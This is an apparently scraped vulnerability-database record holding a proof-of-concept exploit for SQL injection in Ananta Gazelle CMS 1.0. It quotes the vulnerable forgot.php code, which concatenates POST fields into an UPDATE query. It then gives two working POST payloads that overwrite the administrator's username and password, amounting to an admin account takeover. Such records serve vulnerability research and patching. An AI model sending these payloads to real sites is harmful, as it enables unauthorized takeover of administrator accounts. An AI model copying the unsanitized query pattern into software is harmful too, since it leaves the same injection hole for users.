Ananta Gazelle CMS - Update Statement SQL Injection

2014-07-01T00:00:00

Description

No description provided by source.

{"lastseen": "2017-11-19T15:22:37", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "href": "https://www.seebug.org/vuldb/ssvid-72571", "references": [], "enchantments_done": [], "id": "SSV:72571", "title": "Ananta Gazelle CMS - Update Statement SQL Injection", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n # Exploit Title: Ananta Gazelle CMS - Update Statement Sql injection\r\n# Google Dork: -\r\n# Date: 07-02-2012\r\n# Author: hackme\r\n# Software Link: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/\r\n# Version: 1.0 stable\r\n# Tested on: backbox 2.1\r\n# CVE : -\r\n\r\n[SORRY FOR MY BAD ENGLISH]\r\n\r\n[+] This sql injection doesn't allow us to read the contents of the tables, but to do the update statement of the username and password of admin.\r\nSince you can't enter a special chars as the apex, and then we don't change the username and password in what we want, we will copy the value of a column with default value in column username and password.\r\nIn fact we have:\r\n\t\r\n\tadmin - username = 1\r\n - password = 1\r\n\r\n[+] Vulnerable Code(forgot.php): \r\n[CODE]\r\nif (!empty($_POST) && !isset($_POST["loginform"])) {\r\n\t// form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account\r\n\t$sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";\r\n\t\r\n\tif ($_POST["activate"] <> "") {\r\n\t\t$sql = $sql."activate='".$_POST["activate"]."'";\r\n\t}\r\n\t\r\n\t$sql = $sql." WHERE email"."='".$_POST["email"]."'";\r\n\t//no control \r\n\tif (mysql_query($sql)) {\r\n[/code]\r\n[+] default table users columns: number,name,pass,email,activate,active,admin,joindate,showemail\r\n[+] Risk: High\r\n[+] Vuln Page: www.site.it/ananta/forgot.php\r\n\r\n[+] Change admin username in "1" [POST-DATA]\r\nemail=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php\r\n\r\n[+] Change admin password in "1" [POST-DATA]\r\nemail=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php\r\n\r\n[+]...If You Really Want Something, You Can Have It...\r\n\r\n[+] Greetz To: MZ\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72571", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645419742}}